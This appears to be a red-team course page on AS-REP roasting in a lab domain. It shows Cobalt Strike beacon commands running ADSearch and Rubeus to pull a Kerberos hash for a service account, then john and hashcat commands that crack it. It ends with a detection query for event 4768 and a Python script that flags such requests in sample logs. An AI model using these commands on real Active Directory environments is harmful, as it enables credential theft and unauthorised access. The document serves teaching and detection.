# ASREP Roasting

If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password. This configuration is enabled on the User Object and is often seen on accounts that are associated with Linux systems.


![](https://files.cdn.thinkific.com/file_uploads/584845/images/99f/931/1ff/preauth.png)


As with kerberoasting, we don't want to asreproast every account in the domain.


```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,distinguishedname,samaccountname

[*] TOTAL NUMBER OF SEARCH RESULTS: 1
	[+] cn                : Squid Proxy
	[+] distinguishedname : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io
	[+] samaccountname    : squid_svc
```

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /user:squid_svc /nowrap

[*] SamAccountName         : squid_svc
[*] DistinguishedName      : CN=Squid Proxy,CN=Users,DC=dev,DC=cyberbotic,DC=io
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[*] Building AS-REQ (w/o preauth) for: 'dev.cyberbotic.io\squid_svc'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

      $krb5asrep$squid_svc@dev.cyberbotic.io[...]
```


Use `--format=krb5asrep --wordlist=wordlist squid_svc` for john or `-a 0 -m 18200 squid_svc wordlist` for hashcat.

```
$ john --format=krb5asrep --wordlist=wordlist squid_svc
Passw0rd!        ($krb5asrep$squid_svc@dev.cyberbotic.io)
```


**OPSEC**

ASREPRoasting with Rubeus will generate a 4768 event with RC4 encryption and a preauth type of 0.

```
event.code: 4768 and winlog.event_data.PreAuthType: 0 and winlog.event_data.TicketEncryptionType: 0x17
```
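
The same three conditions applied offline to exported events, as an added example that is not part of the original page or of any tool's own code. The records are constructed, the field layout follows the query above, and `TargetUserName` and `IpAddress` are assumed to be present in `event_data`; the account `svc_backup` and the source addresses are made up for the sample.

```python
import json
from collections import defaultdict

RC4_HMAC = 0x17  # TicketEncryptionType value used in the query above

# Constructed sample records (one JSON object per line), not real telemetry.
SAMPLE_EVENTS = """\
{"event": {"code": "4768"}, "winlog": {"event_data": {"TargetUserName": "squid_svc", "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.123.102"}}}
{"event": {"code": "4768"}, "winlog": {"event_data": {"TargetUserName": "svc_backup", "PreAuthType": "0", "TicketEncryptionType": "0x00000017", "IpAddress": "::ffff:10.10.123.102"}}}
{"event": {"code": "4768"}, "winlog": {"event_data": {"TargetUserName": "squid_svc", "PreAuthType": "0", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.120.60"}}}
{"event": {"code": "4768"}, "winlog": {"event_data": {"TargetUserName": "jdoe", "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.123.55"}}}
{"event": {"code": "4769"}, "winlog": {"event_data": {"TargetUserName": "jdoe", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.123.55"}}}
not-json line from a broken shipper
"""


def to_int(value):
    """Parse "0", "0x17" or "0x00000017"; return None for "-" or missing."""
    try:
        return int(str(value).strip(), 0)
    except ValueError:
        return None


def find_asrep_without_preauth(lines):
    """Map source IP -> sorted accounts with 4768 + PreAuthType 0 + RC4."""
    hits = defaultdict(set)
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank or malformed lines
        if not isinstance(rec, dict) or str(rec.get("event", {}).get("code")) != "4768":
            continue
        data = rec.get("winlog", {}).get("event_data", {})
        if to_int(data.get("PreAuthType")) != 0:
            continue
        if to_int(data.get("TicketEncryptionType")) != RC4_HMAC:
            continue
        ip = str(data.get("IpAddress", "unknown"))
        if ip.startswith("::ffff:"):  # IPv4-mapped form seen in 4768 events
            ip = ip[len("::ffff:"):]
        hits[ip].add(data.get("TargetUserName", "?"))
    return {ip: sorted(users) for ip, users in hits.items()}


if __name__ == "__main__":
    for ip, users in find_asrep_without_preauth(SAMPLE_EVENTS.splitlines()).items():
        print(f"{ip}: AS-REP without preauth (RC4) for {', '.join(users)}")
```

The third record (preauth type 0 but `0x12`) is deliberately not reported, because the query above matches only RC4 requests.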


